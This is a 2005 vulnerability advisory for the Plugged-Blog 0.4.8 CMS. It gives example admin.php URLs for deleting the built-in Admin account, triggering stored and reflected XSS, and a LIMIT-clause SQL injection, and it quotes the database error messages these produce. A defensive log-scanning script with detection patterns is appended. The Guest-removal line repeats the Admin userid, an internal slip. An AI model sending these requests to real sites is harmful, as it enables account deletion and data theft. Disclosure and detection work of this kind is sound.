Plugged-Blog 0.4.8 suffers from multiple cross site scripting, SQL injection, and other flaws. Detailed exploitation provided.
###############################
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin
vendor url: http://www.pluggedout.com
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html
vendor notified: yes
exploit available: yes
###############################
Plugged-Blog is a CMS/weblog portal content management system. It is very easy
to install and configure, pleasant to use and fast. It ships with a Readme and is
a good solution for webmasters and ordinary users alike.
#########versions#########
0.4.8
#########Solution#########
No solution at this time !
#########Timeline########
Discovered: 29-07-2005
vendor notify: 29-07-2005
disclosure: 30-07-2005
####### Bad Definition ########
The following parameters are used without any validation (the value is passed straight through, whether or not it is a valid id):
-No validation of variable userid=
-No validation of variable contentid=
-No validation of variable templateid=
-No validation of variable doctypeid=
-No validation of variable list_from=
-No validation of variable usertypeid=
-No validation of variable templateid=
-No validation of variable contenttypeid=
http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What is there to remove if it doesn't exist? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What is there to remove if it doesn't exist? :p
######## How to remove Admin ########
By default the users Admin and Guest exist. The userid of Admin is 2 and the
userid of Guest is 1. To remove Admin, open in the browser:
http://[victim]/admin.php?action=user_del&userid=2
To remove Guest, open in the browser:
http://[victim]/admin.php?action=user_del&userid=2
Observation: this requires being logged in as the Admin user.
##################Proof of concepts##################
Post a message containing XSS code; it is rendered on the weblog home page.
Once such a message has been posted, it is also rendered at these URLs:
####### XSS message #######
http://[victim]/admin.php?action=report_statistics&report=visitors
http://[victim]/admin.php?action=content_list
http://[victim]/admin.php?action=report_statistics&report=page_hits
Select the ID to visit (only the entry that contains the XSS message) and the XSS fires.
#########
XSS
#########
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]
###########
SQL errors & SQL injection
###########
If you put XSS code in the URL:
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]
or simply change the value of contenttypeid=[change-the-valor],
you get the following error message:
Problem with SQL
[SELECT nContentSecurityId, cms_ContentSecurity.nUserTypeId,
cms_ContentSecurity.nContentTypeId, cUserTypeName, cView, cAdd, cEdit, cDelete,
cApprove FROM cms_ContentSecurity INNER JOIN cms_UserType
ON cms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId
WHERE nContentTypeId= ORDER BY cUserTypeName]
And a second error message for the properties table:
Problem with SQL [SELECT * FROM cms_ContentTypeProperties
WHERE nContentTypeId= ORDER BY nSortIndex]
Both errors disclose table and field names.
If you put XSS code in the content_edit URL above, you get the error message:
Could not find record [SELECT * FROM cms_Content WHERE
nContentId=;]
which again gives the name of the affected table and field.
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]
Here the list_from value is placed directly into the LIMIT clause, and the error shows it:
SELECT COUNT(nStatisticId) AS nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress
FROM cms_Statistics GROUP BY cSessionId, cIPAddress ORDER BY dLastView DESC
LIMIT or 1=1,20
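As an added example (not part of the advisory), the following access-log triage flags the request patterns described above: non-numeric values in the unvalidated id parameters (including the LIMIT injection via list_from), user_del against the default Admin/Guest accounts, and markup in the reflected s= parameter. The log format is assumed to be the Apache/nginx combined format and the log lines are constructed.

```python
"""Access-log triage for the Plugged-Blog 0.4.8 admin.php issues described in this
advisory. Added example, not part of the advisory; all sample log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory lists as accepted without validation; each is a numeric id.
INT_PARAMS = {"userid", "contentid", "templateid", "doctypeid",
              "list_from", "usertypeid", "contenttypeid"}
# Default accounts the advisory says user_del can remove (userid -> name).
BUILTIN_USERS = {"1": "Guest", "2": "Admin"}
SQL_WORDS = re.compile(r"\b(or|and|union|select)\b", re.IGNORECASE)
MARKUP = re.compile("[<>\"']")
# Assumed Apache/nginx "combined" log layout: client ip, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def analyze_request(path):
    """Return findings (strings) for one request path; empty list if nothing is suspicious."""
    parts = urlsplit(path)
    if not parts.path.endswith("/admin.php"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx, keeps empty ids
    action = qs.get("action", [""])[0]
    findings = []
    for name in sorted(INT_PARAMS & qs.keys()):
        value = qs[name][0]
        if not value.isdigit():  # empty or non-numeric id: the "Problem with SQL" cases
            kind = "sqli" if SQL_WORDS.search(value) else "tamper"
            findings.append(f"{kind}: non-numeric {name}={value!r} (action={action})")
    if action == "user_del" and qs.get("userid", [""])[0] in BUILTIN_USERS:
        findings.append(f"builtin-delete: {BUILTIN_USERS[qs['userid'][0]]} account")
    if MARKUP.search(qs.get("s", [""])[0]):  # reflected in report_statistics
        findings.append("xss: markup in s= parameter")
    return findings


def scan_log(lines):
    """Yield (client ip, finding) for every suspicious admin.php request in the log."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for finding in analyze_request(m.group("path")):
                yield m.group("ip"), finding


# Constructed sample log: built-in account deletion, LIMIT injection, benign view, XSS probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jul/2005:10:00:01 +0000] "GET /admin.php?action=user_del&userid=2 HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Jul/2005:10:00:02 +0000] "GET /admin.php?action=report_statistics&report=visitors&list_from=or%201%3D1,20 HTTP/1.1" 200 812',
    '198.51.100.9 - - [30/Jul/2005:10:00:03 +0000] "GET /admin.php?action=content_list HTTP/1.1" 200 4096',
    '203.0.113.5 - - [30/Jul/2005:10:00:04 +0000] "GET /admin.php?action=report_statistics&report=visitors&&s=%3Cscript%3E HTTP/1.1" 200 900',
]
```

Running `list(scan_log(SAMPLE_LOG))` yields three findings, all from 203.0.113.5; the benign content_list request produces none.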
######################## end ##########################
Thanks to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
--
Regards:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com